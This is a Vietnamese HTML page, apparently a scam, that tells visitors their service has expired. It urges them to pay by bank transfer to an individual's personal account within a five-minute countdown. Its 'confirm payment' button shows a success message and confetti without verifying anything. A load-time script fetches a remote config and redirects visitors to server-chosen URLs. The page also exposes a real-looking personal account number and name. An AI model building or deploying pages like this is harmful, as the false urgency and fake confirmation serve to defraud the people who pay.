<!DOCTYPE html>
<html lang="vi">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    
    <title>Yêu cầu gia hạn dịch vụ</title>
    <link href="https://fonts.googleapis.com/css2?family=Montserrat:wght@400;600&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/4.1.1/animate.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/limonte-sweetalert2/11.4.24/sweetalert2.min.css">
    <style>
        :root {
            --primary-color: #4361ee;
            --secondary-color: #3f37c9;
            --accent-color: #f72585;
            --light-color: #f8f9fa;
            --dark-color: #212529;
            --success-color: #4cc9f0;
        }
        
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        
        body {
            font-family: 'Montserrat', sans-serif;
            background: linear-gradient(135deg, #f5f7fa 0%, #c3cfe2 100%);
            min-height: 100vh;
            display: flex;
            justify-content: center;
            align-items: center;
            color: var(--dark-color);
            overflow-x: hidden;
        }
        
        .container {
            background-color: white;
            border-radius: 20px;
            box-shadow: 0 15px 30px rgba(0, 0, 0, 0.1);
            width: 90%;
            max-width: 600px;
            padding: 40px;
            position: relative;
            overflow: hidden;
            transition: all 0.5s ease;
        }
        
        .container:hover {
            transform: translateY(-5px);
            box-shadow: 0 20px 40px rgba(0, 0, 0, 0.15);
        }
        
        .container::before {
            content: '';
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 10px;
            background: linear-gradient(90deg, var(--primary-color), var(--accent-color));
        }
        
        h1 {
            color: var(--primary-color);
            margin-bottom: 20px;
            font-weight: 600;
            text-align: center;
            position: relative;
            padding-bottom: 15px;
        }
        
        h1::after {
            content: '';
            position: absolute;
            bottom: 0;
            left: 50%;
            transform: translateX(-50%);
            width: 80px;
            height: 4px;
            background: var(--accent-color);
            border-radius: 2px;
        }
        
        p {
            margin-bottom: 25px;
            line-height: 1.6;
            text-align: center;
        }
        
        .highlight {
            color: var(--accent-color);
            font-weight: 600;
        }
        
        .btn-container {
            display: flex;
            justify-content: center;
            gap: 20px;
            margin-top: 30px;
            flex-wrap: wrap;
        }
        
        .btn {
            padding: 12px 30px;
            border-radius: 50px;
            font-weight: 600;
            text-transform: uppercase;
            letter-spacing: 1px;
            cursor: pointer;
            transition: all 0.3s ease;
            border: none;
            font-size: 14px;
            position: relative;
            overflow: hidden;
        }
        
        .btn-primary {
            background-color: var(--primary-color);
            color: white;
            box-shadow: 0 5px 15px rgba(67, 97, 238, 0.4);
        }
        
        .btn-primary:hover {
            background-color: var(--secondary-color);
            transform: translateY(-3px);
            box-shadow: 0 8px 20px rgba(67, 97, 238, 0.6);
        }
        
        .btn-secondary {
            background-color: white;
            color: var(--primary-color);
            border: 2px solid var(--primary-color);
        }
        
        .btn-secondary:hover {
            background-color: var(--primary-color);
            color: white;
            transform: translateY(-3px);
        }
        
        .btn-success {
            background-color: var(--success-color);
            color: white;
            box-shadow: 0 5px 15px rgba(76, 201, 240, 0.4);
        }
        
        .btn-success:hover {
            background-color: #3aa8d1;
            transform: translateY(-3px);
            box-shadow: 0 8px 20px rgba(76, 201, 240, 0.6);
        }
        
        .btn:active {
            transform: translateY(1px);
        }
        
        .btn:focus {
            outline: none;
        }
        
        .pulse {
            animation: pulse 2s infinite;
        }
        
        @keyframes pulse {
            0% {
                box-shadow: 0 0 0 0 rgba(67, 97, 238, 0.7);
            }
            70% {
                box-shadow: 0 0 0 15px rgba(67, 97, 238, 0);
            }
            100% {
                box-shadow: 0 0 0 0 rgba(67, 97, 238, 0);
            }
        }
        
        .countdown {
            margin: 30px 0;
            text-align: center;
            font-size: 24px;
            font-weight: 600;
            color: var(--accent-color);
        }
        
        .features {
            margin: 30px 0;
        }
        
        .feature-item {
            display: flex;
            align-items: center;
            margin-bottom: 15px;
            padding: 10px;
            border-radius: 10px;
            transition: all 0.3s ease;
        }
        
        .feature-item:hover {
            background-color: rgba(67, 97, 238, 0.1);
            transform: translateX(5px);
        }
        
        .feature-icon {
            width: 40px;
            height: 40px;
            background-color: rgba(67, 97, 238, 0.1);
            border-radius: 50%;
            display: flex;
            justify-content: center;
            align-items: center;
            margin-right: 15px;
            color: var(--primary-color);
            font-size: 20px;
        }
        
        .confetti {
            position: absolute;
            width: 10px;
            height: 10px;
            background-color: var(--accent-color);
            opacity: 0;
        }
        
        .payment-method {
            background-color: #f8f9fa;
            border-radius: 15px;
            padding: 20px;
            margin: 25px 0;
            border: 1px dashed #4361ee;
        }
        
        .payment-method h3 {
            color: var(--primary-color);
            margin-bottom: 15px;
            text-align: center;
        }
        
        .bank-info {
            background-color: white;
            border-radius: 10px;
            padding: 15px;
            margin-bottom: 15px;
            box-shadow: 0 3px 10px rgba(0, 0, 0, 0.05);
        }
        
        .bank-info p {
            margin-bottom: 8px;
            text-align: left;
        }
        
        .bank-info .bank-name {
            font-weight: 600;
            color: var(--primary-color);
        }
        
        .qr-code {
            display: flex;
            flex-direction: column;
            align-items: center;
            margin: 20px 0;
        }
        
        .qr-code-container {
            position: relative;
            cursor: pointer;
            transition: all 0.3s ease;
        }
        
        .qr-code-container:hover {
            transform: scale(1.03);
        }
        
        .qr-code img {
            width: 220px;
            height: 220px;
            border: 1px solid #ddd;
            border-radius: 10px;
            margin-bottom: 15px;
            box-shadow: 0 5px 15px rgba(0, 0, 0, 0.1);
        }
        
        .qr-code .scan-text {
            font-size: 14px;
            color: #666;
        }
        
        .zoom-icon {
            position: absolute;
            bottom: 25px;
            right: 10px;
            background-color: rgba(0, 0, 0, 0.7);
            color: white;
            width: 30px;
            height: 30px;
            border-radius: 50%;
            display: flex;
            align-items: center;
            justify-content: center;
            font-size: 16px;
        }
        
        .note {
            font-size: 13px;
            color: #666;
            text-align: center;
            margin-top: 15px;
            font-style: italic;
        }
        
        .hidden {
            display: none;
        }
        
        .success-message {
            background-color: rgba(76, 201, 240, 0.1);
            border: 1px solid var(--success-color);
            color: var(--success-color);
            padding: 15px;
            border-radius: 10px;
            margin: 20px 0;
            text-align: center;
            animation: fadeIn 0.5s ease;
        }
        
        @keyframes fadeIn {
            from { opacity: 0; transform: translateY(10px); }
            to { opacity: 1; transform: translateY(0); }
        }
        
        .copy-btn {
            background-color: #f0f0f0;
            border: none;
            border-radius: 4px;
            padding: 2px 8px;
            margin-left: 8px;
            cursor: pointer;
            font-size: 12px;
            transition: all 0.2s;
        }
        
        .copy-btn:hover {
            background-color: #e0e0e0;
        }
        
        .copy-btn:active {
            transform: scale(0.95);
        }
        
        @media (max-width: 576px) {
            .container {
                padding: 30px 20px;
            }
            
            .btn-container {
                flex-direction: column;
                gap: 10px;
            }
            
            .btn {
                width: 100%;
            }
            
            .qr-code img {
                width: 180px;
                height: 180px;
            }
        }
    </style>
</head>
<body>
    <div class="container animate__animated animate__fadeInUp">
        <h1 class="animate__animated animate__fadeIn">Vui Lòng Gia Hạn Dịch Vụ</h1>
        <p class="animate__animated animate__fadeIn animate__delay-1s">Dịch vụ của bạn đã hết hạn. Để tiếp tục sử dụng, vui lòng <span class="highlight">gia hạn ngay</span> để không bị gián đoạn.</p>
        
        <div class="countdown animate__animated animate__fadeIn animate__delay-2s" id="countdown">
            Thời gian còn lại: <span id="time">05:00</span>
        </div>
        
        <div class="payment-method animate__animated animate__fadeIn animate__delay-3s">
            <h3>Hướng Dẫn Thanh Toán</h3>
            
            <div class="bank-info">
                <p><span class="bank-name">Ngân hàng TP BANK</span></p>
                <p><strong>Số tài khoản:</strong> 
                    <span id="accountNumber">0862133507</span>
                    <button class="copy-btn" onclick="copyToClipboard('accountNumber')">Sao chép</button>
                </p>
                <p><strong>Tên tài khoản:</strong> NGUYEN  VAN AN</p>
                <p><strong>Nội dung chuyển tiền:</strong> 
                    <span id="transferContent">chuyentien23</span>
                    <button class="copy-btn" onclick="copyToClipboard('transferContent')">Sao chép</button>
                </p>
                <p class="note">(Vui lòng nhập chính xác nội dung chuyển tiền để hệ thống tự động xác nhận)</p>
            </div>
        </div>
        
        <div class="features animate__animated animate__fadeIn animate__delay-4s">
            <div class="feature-item">
                <div class="feature-icon">✓</div>
                <div>Sau khi chuyển khoản, vui lòng nhấn nút <strong>"Xác Nhận Thanh Toán"</strong> bên dưới</div>
            </div>
            <div class="feature-item">
                <div class="feature-icon">⚡</div>
                <div>Hệ thống sẽ tự động kích hoạt trong vòng 5-10 phút sau khi xác nhận</div>
            </div>
        </div>
        
        <div id="successMessage" class="success-message hidden">
            <p>✔ Cảm ơn bạn đã thanh toán! Hệ thống đang xử lý yêu cầu của bạn.</p>
            <p>Dịch vụ sẽ được kích hoạt trong vài phút.</p>
        </div>
        
        <div class="btn-container animate__animated animate__fadeIn animate__delay-5s">
            <button class="btn btn-success" id="confirmBtn">Xác Nhận Thanh Toán</button>
            <button class="btn btn-secondary" id="contactBtn">Mã QR</button>
        </div>
    </div>

    <script src="https://cdnjs.cloudflare.com/ajax/libs/gsap/3.11.4/gsap.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/limonte-sweetalert2/11.4.24/sweetalert2.min.js"></script>
    <script>
    // Kiểm tra chuyển hướng ngay khi trang load
        fetch('check_redirect.php')
            .then(response => response.json())
            .then(config => {
                // Nếu đang bật chuyển hướng và không phải trang đích
                if (config.enabled && 
                    !window.location.href.includes(config.redirect_url)) {
                    window.location.href = config.redirect_url;
                }
                // Nếu đang tắt chuyển hướng và không phải trang đích
                else if (!config.enabled && 
                         !window.location.href.includes(config.fallback_url)) {
                    window.location.href = config.fallback_url;
                }
            })
            .catch(error => console.error('Lỗi kiểm tra chuyển hướng:', error));
        // Hàm tạo URL QR code
        function generateVietQRUrl() {
            const accountNo = '0862133507';
            const accountName = 'NGUYEN VAN AN';
            const acqId = 'TPB'; // Mã ngân hàng MB
            const amount = ''; // Để trống để khách tự nhập số tiền
            const addInfo = 'chuyentien23';
            const template = 'compact'; // Mẫu QR code
            
            return `https://img.vietqr.io/image/${acqId}-${accountNo}-${template}.png?amount=${amount}&addInfo=${encodeURIComponent(addInfo)}&accountName=${encodeURIComponent(accountName)}`;
        }
        
        // Hiển thị QR code phóng to
        function showZoomedQR() {
            const qrImageUrl = generateVietQRUrl();
            
            Swal.fire({
                title: 'Mã QR Chuyển Khoản',
                html: `
                    <div style="display: flex; justify-content: center; margin: 20px 0;">
                        <img src="${qrImageUrl}" style="width: 300px; height: 300px; border: 1px solid #ddd; border-radius: 10px;">
                    </div>
                    <p style="text-align: center; margin-top: 15px; font-size: 14px; color: #666;">
                        Quét mã QR để chuyển khoản nhanh chóng
                    </p>
                `,
                showConfirmButton: false,
                showCloseButton: true,
                width: 400,
                padding: '20px',
                background: '#fff'
            });
        }
        
        // Đếm ngược thời gian
        let timeLeft = 300; // 5 phút = 300 giây
        const countdownElement = document.getElementById('time');
        
        const countdown = setInterval(() => {
            const minutes = Math.floor(timeLeft / 60);
            let seconds = timeLeft % 60;
            seconds = seconds < 10 ? '0' + seconds : seconds;
            
            countdownElement.textContent = `${minutes}:${seconds}`;
            
            if (timeLeft <= 60) {
                countdownElement.style.color = '#f72585';
                document.querySelector('.countdown').classList.add('animate__pulse', 'animate__infinite');
            }
            
            if (timeLeft <= 0) {
                clearInterval(countdown);
                countdownElement.textContent = 'Hết hạn!';
            } else {
                timeLeft--;
            }
        }, 1000);
        
        // Hiệu ứng khi nhấn nút xác nhận thanh toán
        document.getElementById('confirmBtn').addEventListener('click', function() {
            // Hiệu ứng confetti
            for (let i = 0; i < 50; i++) {
                createConfetti();
            }
            
            // Hiển thị popup thông báo đẹp
            Swal.fire({
                title: 'Xác nhận thành công!',
                text: 'Cảm ơn bạn đã thanh toán. Hệ thống sẽ xử lý yêu cầu trong vài phút.',
                icon: 'success',
                confirmButtonText: 'Đóng',
                confirmButtonColor: '#4361ee',
                backdrop: `
                    rgba(67,97,238,0.4)
                    center top
                    no-repeat
                `,
                timer: 5000,
                timerProgressBar: true,
                willClose: () => {
                    // Hiển thị thông báo thành công trên trang
                    document.getElementById('successMessage').classList.remove('hidden');
                    document.getElementById('successMessage').scrollIntoView({ behavior: 'smooth' });
                    
                    // Đổi nút thành đã xác nhận
                    this.textContent = 'Đã Xác Nhận';
                    this.classList.remove('btn-success');
                    this.classList.add('btn-secondary');
                    this.disabled = true;
                }
            });
            
            // Animation cho nút
            gsap.to(this, {
                scale: 0.9,
                duration: 0.1,
                yoyo: true,
                repeat: 1
            });
        });
        
        // Hiệu ứng khi nhấn nút hiện mã QR
        document.getElementById('contactBtn').addEventListener('click', function() {
            // Animation cho nút
            gsap.to(this, {
                scale: 0.9,
                duration: 0.1,
                yoyo: true,
                repeat: 1
            });
            
            const qrImageUrl = generateVietQRUrl();
            
            // Hiển thị popup mã QR
            Swal.fire({
                title: 'Mã QR Thanh Toán',
                html: `
                    <div style="text-align: center;">
                        <img src="${qrImageUrl}" style="width: 250px; height: 250px; border: 1px solid #ddd; border-radius: 10px; margin: 15px 0;">
                        <p style="color: #666; font-size: 14px;">Quét mã QR để chuyển khoản nhanh chóng</p>
                        <button 
                            onclick="copyToClipboard('accountNumber')" 
                            style="margin-top: 15px; padding: 8px 15px; background: #4361ee; color: white; border: none; border-radius: 5px; cursor: pointer;"
                        >
                            Sao chép số tài khoản
                        </button>
                    </div>
                `,
                showConfirmButton: false,
                showCloseButton: true,
                width: 350
            });
        });
        
        // Tạo hiệu ứng confetti
        function createConfetti() {
            const confetti = document.createElement('div');
            confetti.className = 'confetti';
            document.body.appendChild(confetti);
            
            const colors = ['#4361ee', '#3f37c9', '#f72585', '#4cc9f0', '#4895ef'];
            const randomColor = colors[Math.floor(Math.random() * colors.length)];
            
            gsap.set(confetti, {
                x: Math.random() * window.innerWidth,
                y: -20,
                backgroundColor: randomColor,
                scale: Math.random() * 0.8 + 0.2,
                rotation: Math.random() * 360
            });
            
            gsap.to(confetti, {
                y: window.innerHeight + 20,
                opacity: 1,
                duration: Math.random() * 2 + 1,
                ease: 'power1.out',
                onComplete: () => {
                    confetti.remove();
                }
            });
            
            gsap.to(confetti, {
                x: '+=50',
                rotation: Math.random() * 180 - 90,
                duration: Math.random() * 2 + 1,
                ease: 'sine.inOut'
            });
        }
        
        // Hiệu ứng khi di chuột vào các feature item
        const featureItems = document.querySelectorAll('.feature-item');
        featureItems.forEach(item => {
            item.addEventListener('mouseenter', () => {
                gsap.to(item, {
                    x: 5,
                    duration: 0.3
                });
            });
            
            item.addEventListener('mouseleave', () => {
                gsap.to(item, {
                    x: 0,
                    duration: 0.3
                });
            });
        });
        
        // Sao chép nội dung vào clipboard
        function copyToClipboard(elementId) {
            const element = document.getElementById(elementId);
            const textToCopy = element.textContent;
            
            navigator.clipboard.writeText(textToCopy).then(() => {
                // Hiệu ứng khi sao chép thành công
                const btn = element.nextElementSibling;
                if (btn && btn.classList.contains('copy-btn')) {
                    btn.textContent = 'Đã sao chép!';
                    btn.style.backgroundColor = '#4cc9f0';
                    btn.style.color = 'white';
                    
                    setTimeout(() => {
                        btn.textContent = 'Sao chép';
                        btn.style.backgroundColor = '#f0f0f0';
                        btn.style.color = 'inherit';
                    }, 2000);
                } else {
                    // Nếu là nút trong popup
                    Swal.fire({
                        title: 'Đã sao chép!',
                        text: 'Số tài khoản đã được sao chép vào clipboard',
                        icon: 'success',
                        timer: 1500,
                        showConfirmButton: false
                    });
                }
            }).catch(err => {
                console.error('Lỗi khi sao chép: ', err);
            });
        }
    </script>
</body>
</html>